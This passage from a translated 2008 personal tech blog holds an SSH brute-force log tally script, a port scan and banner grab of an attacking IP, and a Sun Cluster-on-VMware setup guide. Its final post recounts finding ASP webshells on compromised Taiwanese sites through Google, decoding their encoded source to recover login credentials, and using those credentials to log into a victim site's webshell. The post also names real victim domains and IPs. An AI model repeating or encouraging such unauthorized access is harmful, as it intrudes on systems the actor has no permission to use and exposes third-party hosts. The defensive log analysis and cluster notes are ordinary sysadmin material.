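        ip, ts = m.group("ip"), parse_ts(m.group("ts"), year)
        s = stats.setdefault(ip, {"users": Counter(), "first_probe": None,
                                  "first_fail": None, "last_fail": None})
        if "user" not in m.groupdict():   # connection probe, no login yet
            s["first_probe"] = ts if s["first_probe"] is None else min(s["first_probe"], ts)
            continue
        s["users"][m.group("user")] += 1
        s["first_fail"] = ts if s["first_fail"] is None else min(s["first_fail"], ts)
        s["last_fail"] = ts if s["last_fail"] is None else max(s["last_fail"], ts)
    return stats


def report(stats, min_failures=10):
    """Sources with at least min_failures failed logins, busiest first.

    Each row: (ip, total failures, seconds from first to last failure,
    [(user, tries), ...] most-tried first), i.e. the post's hand-made tally.
    """
    rows = []
    for ip, s in stats.items():
        total = sum(s["users"].values())
        if total < min_failures or s["first_fail"] is None:
            continue
        span = int((s["last_fail"] - s["first_fail"]).total_seconds())
        rows.append((ip, total, span, s["users"].most_common()))
    return sorted(rows, key=lambda r: r[1], reverse=True)


if __name__ == "__main__":
    for ip, total, span, users in report(summarize(SAMPLE_LOG), min_failures=5):
        print(f"{ip}: {total} failed logins over {span}s; "
              + ", ".join(f"{u} {n}" for u, n in users))
```

Feed it `open("/var/log/auth.log")` (or `secure` on Red Hat systems) instead of `SAMPLE_LOG` to get the same tally for a real host.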

I ran NMAP against the machine 59.125.163.62:
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
554/tcp open rtsp
904/tcp open unknown =>VMware Authentication Daemon
5901/tcp open vnc-1
10000/tcp open snet-sensor-mgmt =>WEBMIN =_=
Looks like no particular protection at all....=_=

# telnet 59.125.163.62 904
Trying 59.125.163.62...
Connected to 59.125.163.62.
Escape character is '^]'.
220 VMware Authentication Daemon Version 1.10: SSL Required, MKSDisplayProtocol:VNC

TELNETing to its TCP/80 shows

Apache/2.2.3 (Fedora) Server at www.m■■■■e.net Port 80
Site name masked..

Heh.. so it's a machine running on Fedora, and it even provides services; a bit of GOOGLING suggests it offers some WAP/PDA information services.

On balance I'm inclined to think that machine is itself a victim too..

Postscript: less than half an hour after I finished typing this post, two more machines came to TRY, 83.145.82.134 & 90.183.8.146, with the same behaviour pattern as described above;
it seems there are plenty of machines spraying SSH port scans like this, and the frequency is high.... three visits within half a day of opening the port.

Conclusion: when you set up a machine, do the protection that needs doing; shut down or block services that don't need to face the outside, change the ssh port if you can.. and check the machine for anomalies every now and then..

2008-03-05

Sun Cluster & Scalable Service test in VMWARE test environment..

Just noticed it's been more than a month without an UPDATE..
In fact I did write a few things during this period, but held them back after writing; looking at them again a few days later they seemed poorly written, so I dropped them..
Writing prose is not my strength after all, no need to scribble just to fill space..
But after more than a month lying fallow the mushrooms have grown over everything, so let me dig up something from the past to water it a bit..

In early 2006 I needed to test Sun Cluster for work,
(at the time it was to prepare for my boss bidding on the DHCP/RADIUS Service for a Chunghwa Telecom WIFI PHONE/MOD PHONE project; in the end that project came to nothing anyway.)

During the development, testing and tuning phase we didn't have the budget for SPARC machines to test on.
Only two days before the final on-site evaluation did we actually have SPARC machines to tune on.
Using a pile of x86 machines would also have been a hassle..
So I tried building a Sun Cluster environment in VMWARE for testing.
I've briefly recorded the whole build process below, as a note.
Mainly the quorum device & global device parts.. which took a fair amount of trial & error time.

1. First go to http://www.sun.com/ and download Solaris 9 x86 & Sun Cluster 3.1 x86 0904.

2. Create a new Virtual Machine in VMWARE.
For Guest OS choose Solaris 9.
VMWARE will install Solaris 9 on an IDE DISK;
for SCSI you must choose LSI SCSI for the built-in Solaris driver to recognise it,
but we can ignore the SCSI part for now
and deal with it at the end when setting up the Quorum device.
Give the VM three network cards: one as the public network interface, the other two for the cluster interconnect.

3. Start installing Solaris 9 x86;
this machine will be Node1. When partitioning the disk during installation, create one extra partition
for /globaldevices (on Node1 I set it to c0d0s3);
sun cluster will use this partition later.

4. Once Node1 is installed,
use VMWARE's clone function to copy it as Node2 (saves the installation time).

5. Change Node2's hostname & ip
to avoid conflicting with Node1:
/etc/nodename /etc/hosts /etc/hostname.pcn0

6. Adjust Node2's /globaldevices partition so it is not the same as Node1's;
otherwise after the cluster is installed the two nodes' globaldevices will clash.
(I moved /globaldevices to c0d0s4.)
This is odd; docs.sun.com doesn't mention it, and it took many tries to find the fix.
Probably they never imagined anyone would be daft enough to install a cluster on IDE disks. Ha..=_="

7. On both machines add each other's IP/HOSTNAME to /etc/hosts.

8. Add the Quorum device:
Shut down both NODE VMs.. first create a SCSI DISK inside one of the VMs..
then go to the other NODE, add a DISK, choose an existing virtual disk,
and point it at the DISK file just created.
Next edit the .vmx files of both VMs.. and add
scsi0:0.mode = "independent-persistent"
scsi0:0.deviceType = "disk"
disk.locking=FALSE <= disabling the DISK LOCK is what lets both nodes use this DEVICE as the Quorum device.
A 2-Node cluster must have a quorum device to work properly.. with 3 Nodes or more it isn't required.. but without one there are still some problems during failover.

9. After Node1 & Node2 boot, use drvconfig, devlinks, disks to add this SCSI disk.. then format and newfs only need to be done on one of them.

10. Start installing Sun Cluster 3.1 x86 0904.. the installation process is described in detail on docs.sun.com.. not repeated here.
Either scinstall or install works..
the only difference is that one configures while installing.. the other installs first.. and configures afterwards.
Just follow sun's documentation for the configuration.

11. On any Node where the cluster installation has completed, run /usr/cluster/bin/scsetup.
It will first ask you to specify the quorum device..
You can use /usr/cluster/bin/scdidadm -L
to see which did the newly created SCSI DISK was assigned to;
in my case it was recognised as /dev/did/rdsk/d3,
so in scsetup I set the quorum device to d3.

12. Then you can use scsetup to configure the cluster further.. and start testing… ^^
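A sanity check for step 8, added here as an example and not part of the original notes: it parses both nodes' .vmx files and confirms the quorum disk is shared the way the steps require (same disk file on both nodes, independent-persistent mode, disk.locking off, LSI Logic SCSI controller). The .vmx contents are constructed; node2 deliberately omits disk.locking so the check has something to report.

```python
def parse_vmx(text):
    """Parse VMware .vmx 'key = "value"' lines into a dict.

    Blank lines and # comments are skipped; quotes around values are dropped,
    so both disk.locking=FALSE and disk.locking = "FALSE" parse the same way.
    """
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        cfg[key.strip()] = value.strip().strip('"')
    return cfg


def check_quorum_disk(cfg, dev="scsi0:0"):
    """Problems with one node's config for a disk that must be shared."""
    ctrl = dev.split(":")[0]                       # "scsi0:0" -> "scsi0"
    wanted = {
        f"{dev}.present": "TRUE",
        f"{dev}.deviceType": "disk",
        f"{dev}.mode": "independent-persistent",   # no snapshot / redo log
        "disk.locking": "FALSE",                   # both VMs may open the file
        f"{ctrl}.virtualDev": "lsilogic",          # the controller Solaris 9 sees
    }
    problems = []
    for key, expect in wanted.items():
        actual = cfg.get(key)
        if actual is None or actual.lower() != expect.lower():
            problems.append(f'{key} is {actual!r}, expected "{expect}"')
    return problems


def check_cluster_pair(node1_text, node2_text, dev="scsi0:0"):
    """Problems across both nodes; an empty list means the disk is shareable."""
    c1, c2 = parse_vmx(node1_text), parse_vmx(node2_text)
    problems = [f"node1: {p}" for p in check_quorum_disk(c1, dev)]
    problems += [f"node2: {p}" for p in check_quorum_disk(c2, dev)]
    if c1.get(f"{dev}.fileName") != c2.get(f"{dev}.fileName"):
        problems.append(f"{dev}.fileName differs between nodes")
    return problems


# Constructed sample configs (only the keys relevant to the shared disk).
NODE1_VMX = """\
scsi0.present = "TRUE"
scsi0.virtualDev = "lsilogic"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "quorum.vmdk"
scsi0:0.deviceType = "disk"
scsi0:0.mode = "independent-persistent"
disk.locking = "FALSE"
"""

# Node2 was cloned and given the existing disk, but disk.locking was forgotten.
NODE2_VMX = """\
scsi0.present = "TRUE"
scsi0.virtualDev = "lsilogic"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "quorum.vmdk"
scsi0:0.deviceType = "disk"
scsi0:0.mode = "independent-persistent"
"""

if __name__ == "__main__":
    for p in check_cluster_pair(NODE1_VMX, NODE2_VMX) or ["quorum disk config OK"]:
        print(p)
```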

Next, a simple test of a Scalable Service using SSHD as the target.

This is a test of a Sun Cluster Scalable Service using SSHD.
Stop sshd first, and stop its rc script.

SHARED ADDRESS: VMS9 (192.168.1.110)
NODE1: VMS9A (192.168.1.111)
NODE2: VMS9B (192.168.1.112)

# register the GDS resource type and the shared-address resource group
scrgadm -a -t SUNW.gds
scrgadm -a -g sa_rg
scrgadm -a -S -g sa_rg -l VMS9
# scalable resource group for sshd, two primaries, depending on sa_rg
scrgadm -a -g SSH -y Maximum_primaries=2 -y Desired_primaries=2 \
    -y RG_dependencies=sa_rg
scrgadm -a -j SSHD -g SSH -t SUNW.gds -y Scalable=TRUE \
    -y Start_timeout=120 -y Stop_timeout=120 -y Port_list="22/tcp" \
    -x Start_command="/etc/init.d/sshd start" \
    -x Stop_command="/etc/init.d/sshd stop" \
    -y Network_resources_used=VMS9 \
    -x Failover_enabled=TRUE -x Stop_signal=9
# bring both resource groups online
scswitch -Z -g sa_rg
scswitch -Z -g SSH

Test:
VMS9 (192.168.1.110) is bound on VMS9A (192.168.1.111);
ssh to VMS9 => lands on VMS9A & VMS9B....

2008-01-10

Continued: digging up a pile of compromised Taiwanese websites via GOOGLE



Today, with nothing better to do, I kept searching for that asp webshell by keyword, and made an unexpected discovery.




One site actually shows the asp source code directly..


First look at its setup.. it's an apache server..

They put asp on apache, no wonder the whole source is shown.

Next, study the source code of this asp.

Although it's encoded with VBScript.Encode, that's no obstacle for the great god google.

First find the login-related part of the source.

Ask the great god google to find a VBScript.Encode decoder.


Paste that encoded code in.



Once decoded, you find account and password information inside..

(I've masked the account and password here, so idle people won't try them. Anyone with some idea can follow this line of thought and find it themselves.)

Next, use the recovered account and password to try logging in to one of the sites he compromised.

....and just like that, I'm in.....

The first thing you see is a file management interface, but the permissions are restricted.

With this account you can only look, you can't do much.

I couldn't be bothered to spend more time playing with it..



Next, let's see whose machines these compromised ones are..

Put their host names into whois and look them up.



First victim: knrglass.com, IP 61.66.28.117 (a SPARQ IP).

Reverse DNS of the IP resolves to w17.12.com.tw.

w17.12.com.tw is used by 戰X策's virtual hosting.

Another victim: chungshih.com

Its IP reverse-resolves to a 戰X策 virtual host as well.





Looks like more than one of 戰X策's virtual hosts has fallen..


GOOGLE has found these ASPSHELL programs for them.

戰X策 still hasn't noticed.. compare this post written by netizen roamer:
資訊鐵胃...再多木馬都塞的下? - roamer - Yahoo!奇摩部落格

All I can say is that this is the greatest irony....